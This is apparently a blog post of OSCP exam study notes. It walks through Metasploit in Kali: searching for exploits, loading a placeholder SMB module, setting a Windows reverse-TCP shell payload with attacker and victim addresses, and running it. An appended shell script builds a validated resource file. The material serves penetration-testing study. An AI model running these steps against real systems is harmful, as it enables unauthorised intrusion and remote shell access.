These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.
Use Kali Linux for all the following instructions.
Prep:
Ensure PostgreSQL is running (Metasploit uses it for its database backend):
$> sudo /etc/init.d/postgresql start
Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable
From the command line, fire up the Metasploit console:
$> msfconsole
Search for exploits related to what you are interested in:
msf> search smb
Or, be more specific:
msf> search name:smb type:exploit platform:windows
Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb
Once you find an exploit you want, select it with the use command:
msf> use exploit/windows/smb_hack
Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp
See what options are set:
msf> show options
Set options as needed:
LHOST is the IP address the victim host will connect back to (your Kali VM, for example):
msf> set LHOST 192.168.0.x
RHOST is the IP address of the victim:
msf> set RHOST 192.168.1.x
The default port is 80, but set a different one if you wish:
msf> set RPORT 8081
Run the exploit:
msf> exploit
If you are trying to get a remote shell and it looks like nothing is happening, you may already be sitting in the shell: it often opens without printing a prompt. Just try executing a command and see what happens:
ls, dir, pwd, id
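The steps above (select a module, set a payload, set LHOST/RHOST/RPORT, review the options) can be bundled into a Metasploit resource script and run with msfconsole -r. The script below is an added example, not part of the original notes or of Metasploit itself: it writes such a resource file after sanity-checking the addresses and port, which catches the common slip of leaving a "192.168.0.x" placeholder in an option. The function names, the sample values and the module name (the same placeholder the notes use) are assumptions for illustration; the file it produces stops at show options so you still review the settings before typing exploit yourself.

```shell
#!/bin/sh
# Added example (not from the original notes): build a Metasploit resource
# script from the msfconsole steps above and validate the inputs first.

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0-255.
is_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS
  IFS=.
  set -- $1            # split the address into its four octets
  IFS=$old_ifs
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Return 0 if $1 is an integer TCP port in 1-65535.
is_port() {
  case $1 in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# write_rc MODULE PAYLOAD LHOST RHOST RPORT OUTFILE
# Writes the resource script to OUTFILE; fails (non-zero) on a bad option
# so a placeholder never reaches msfconsole.
write_rc() {
  mod=$1; pay=$2; lhost=$3; rhost=$4; rport=$5; out=$6
  is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  is_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
  is_port "$rport"  || { echo "bad RPORT: $rport" >&2; return 1; }
  {
    echo "use $mod"
    echo "set PAYLOAD $pay"
    echo "set LHOST $lhost"
    echo "set RHOST $rhost"
    echo "set RPORT $rport"
    echo "show options"      # review here; run 'exploit' manually afterwards
  } > "$out"
}

# Demo with constructed sample values (the module name is the placeholder
# used in the notes, not a real Metasploit module).
demo_rc=$(mktemp)
write_rc exploit/windows/smb_hack windows/shell/reverse_tcp \
         192.168.0.10 192.168.1.20 8081 "$demo_rc" \
  && echo "resource script written to $demo_rc; run: msfconsole -r $demo_rc"
```

Running msfconsole -r on the generated file replays the commands in order and leaves you at the msf prompt with the options shown, which is the point at which the notes say to check show options and then run exploit.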